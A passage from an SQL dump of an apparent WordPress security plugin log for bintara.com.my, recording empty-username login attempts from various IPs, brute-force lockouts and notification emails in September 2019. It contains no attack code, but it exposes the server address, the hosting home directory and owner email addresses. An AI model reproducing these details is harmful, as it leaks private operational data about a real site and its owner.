Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYtOrfBTP0kPOVnb8jwrwAAAEM\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"51.15.189.102\";s:11:\"REMOTE_PORT\";s:5:\"47356\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYtOrfBTP0kPOVnb8jwrwAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074490.9006\";s:12:\"REQUEST_TIME\";s:10:\"1569074490\";}}','notice','2019-09-21 14:01:32','2019-09-21 14:01:31',17847680,19338032,'https://bintara.com.my/blog/wp-login.php',1,0,'51.15.189.102'),(25839,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:15:28','2019-09-21 13:15:27',18089784,19289840,'https://bintara.com.my/blog/wp-login.php',1,0,'185.167.101.30'),(25840,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYijXkXpgmG5P@iB8kwIwAAAJY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.72.200\";s:11:\"REMOTE_PORT\";s:5:\"43028\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYijXkXpgmG5P@iB8kwIwAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071757.7803\";s:12:\"REQUEST_TIME\";s:10:\"1569071757\";}}','notice','2019-09-21 13:15:59','2019-09-21 13:15:58',17799152,19289712,'https://bintara.com.my/2019/wp-login.php',1,0,'144.217.72.200'),(25841,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:15:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:15:58\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:30:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:30:58\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:15:59','2019-09-21 13:15:58',17883928,19289712,'https://bintara.com.my/2019/wp-login.php',1,0,'144.217.72.200'),(25842,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:15:59','2019-09-21 13:15:58',18090168,19289712,'https://bintara.com.my/2019/wp-login.php',1,0,'144.217.72.200'),(25843,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYioHkXpgmG5P@iB8kwNAAAAII\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"139.59.100.255\";s:11:\"REMOTE_PORT\";s:5:\"51606\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYioHkXpgmG5P@iB8kwNAAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071776.5498\";s:12:\"REQUEST_TIME\";s:10:\"1569071776\";}}','notice','2019-09-21 13:16:17','2019-09-21 13:16:16',17799104,19289720,'https://bintara.com.my/test/wp-login.php',1,0,'139.59.100.255'),(25844,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:16:16\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:16:16\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:31:16\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:31:16\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:16:17','2019-09-21 13:16:16',17883712,19289720,'https://bintara.com.my/test/wp-login.php',1,0,'139.59.100.255'),(25845,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:16:17','2019-09-21 13:16:16',18089616,19289720,'https://bintara.com.my/test/wp-login.php',1,0,'139.59.100.255'),(25846,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYirXkXpgmG5P@iB8kwPwAAAII\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.27.238\";s:11:\"REMOTE_PORT\";s:5:\"55652\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYirXkXpgmG5P@iB8kwPwAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071789.2827\";s:12:\"REQUEST_TIME\";s:10:\"1569071789\";}}','notice','2019-09-21 13:16:30','2019-09-21 13:16:29',17799104,19289720,'https://bintara.com.my/blog/wp-login.php',1,0,'104.248.27.238'),(25847,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:16:29\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:16:29\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:31:29\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:31:29\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:16:30','2019-09-21 13:16:29',17883712,19289720,'https://bintara.com.my/blog/wp-login.php',1,0,'104.248.27.238'),(25848,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:16:30','2019-09-21 13:16:29',18089616,19289720,'https://bintara.com.my/blog/wp-login.php',1,0,'104.248.27.238'),(25849,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYi2LfBTP0kPOVnb8juBQAAAFQ\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"92.222.9.173\";s:11:\"REMOTE_PORT\";s:5:\"40086\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYi2LfBTP0kPOVnb8juBQAAAFQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071832.5077\";s:12:\"REQUEST_TIME\";s:10:\"1569071832\";}}','notice','2019-09-21 13:17:13','2019-09-21 13:17:12',17797184,19286864,'https://bintara.com.my/wordpress/wp-login.php',1,0,'92.222.9.173'),(25850,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:17:12\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:17:12\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:32:12\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:32:12\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:17:14','2019-09-21 13:17:12',17881928,19286864,'https://bintara.com.my/wordpress/wp-login.php',1,0,'92.222.9.173'),(25851,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:17:14','2019-09-21 13:17:12',18087568,19286864,'https://bintara.com.my/wordpress/wp-login.php',1,0,'92.222.9.173'),(25852,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYi2DDrcQxTmGrCWuaQ4gAAAdY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"51.77.193.28\";s:11:\"REMOTE_PORT\";s:5:\"57168\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYi2DDrcQxTmGrCWuaQ4gAAAdY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071832.5726\";s:12:\"REQUEST_TIME\";s:10:\"1569071832\";}}','notice','2019-09-21 13:17:14','2019-09-21 13:17:12',17796024,19286408,'https://bintara.com.my/wp/wp-login.php',1,0,'51.77.193.28'),(25853,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYjAHkXpgmG5P@iB8kwkQAAAIQ\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.80.190\";s:11:\"REMOTE_PORT\";s:5:\"10459\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/w